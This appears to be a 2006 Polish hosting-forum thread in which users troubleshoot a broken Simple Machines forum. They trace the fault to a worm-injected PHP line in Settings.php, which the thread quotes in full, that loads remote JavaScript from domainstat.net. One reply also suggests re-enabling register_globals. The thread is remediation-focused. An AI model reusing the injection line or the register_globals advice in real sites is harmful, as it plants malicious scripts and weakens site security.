siema, korzystam z board'u do forum simple machines i wchodze dzis i nagle mam takie cos... ktos moze wie co sie stalo ? prosze o pomoc
| Code: |
| session_start(): Cannot send session cookie - headers already sent by (output started at /home/****/domains/*******/public_html/forum/Settings.php:61) |
usuń ciasteczka coś masz tam naskrobane nieźle
na początku (zaraz za <?php) skryptu wstaw:
i na koncu (zaraz przed ?>)
Problem jest związany z tym że przeglądarka już odebrała jakieś dane w nagłówku a może to zrobić tylko raz.
nic nie pomoglo :/ to jest linia 61 ;/ (ciastka tez wyczyscilem)
| Code: |
| ?><? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=de6993f'></script>";}?> |
ps: nie tylko mi wyskakuje ten blad, o nim dowiedzialem sie od kumpla ktory chcial wejsc na moje forum
Edit: poradzilem sobie inaczej
wyedytowalem swiezy plik settings.php i podmienilem, wszystko jak narazie dziala ale jesli ktos wie jaki jest blad w tej lini, prosze o pomoc na pewno sie przyda na przyszlosc w razie awarii 
| Nolt wrote: |
| Code: | | ?><? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=de6993f'></script>";}?> |
|
Tego code nie powinno byc tam, lepiej go osunac.
http://www.frihost.com/forums/vt-34504.html
spoko wlasnie tak cos mi sie nie zgadzalo bo orginalnie nie bylo tego kodu, Thanks Bondings.
CLOSED
Wyzej wymieniony kod to sprawka robaka ktory panoszyl sie po serwerze 2. Zmienil on wyglad stron (czyt. zepsul) dopisujac do plikow php ten wlasnie kod. Aby to naprawic poprostu trzeba usunac zbedny kod lub przywrocic pliki z kopii zapasowej. W wiekszosci atakowane pliki to pliki z uprawnieniami chmod 777.
Na serwerze 2 wyloczyli rowniez register_globals, ze wzgledow bezpieczenstwa. To rowniez moze byc pzyczyna prawidlowego dzialania stron kozystajacych z tego. Jesli na waszych stronach jest to jednak potrzebne wystarczy dopisac w plik .htaccess linie
php_flag register_globals on
| kla_bor wrote: |
Wyzej wymieniony kod to sprawka robaka ktory panoszyl sie po serwerze 2. Zmienil on wyglad stron (czyt. zepsul) dopisujac do plikow php ten wlasnie kod. Aby to naprawic poprostu trzeba usunac zbedny kod lub przywrocic pliki z kopii zapasowej. W wiekszosci atakowane pliki to pliki z uprawnieniami chmod 777.
Na serwerze 2 wyloczyli rowniez register_globals, ze wzgledow bezpieczenstwa. To rowniez moze byc pzyczyna prawidlowego dzialania stron kozystajacych z tego. Jesli na waszych stronach jest to jednak potrzebne wystarczy dopisac w plik .htaccess linie
php_flag register_globals on |
Register globals jest nie bezpieczne, nie powinno się go używać...
A no cóż w którym pliku może wstawiać te niepotrzebne linijki, ponieważ też mam z tym problem, a nie potrafie znaleść tego co mama wywalić:/
Last edited by Calemb on Mon Apr 24, 2006 4:35 pm; edited 1 time in total
Jako kiepsko myśląca, bo zmęczona istota chce się dowiedzieć co ja mam zrobić, bo cześć funkcji mi nie działa
..
które pliki wymienić, co trzeba zrobić?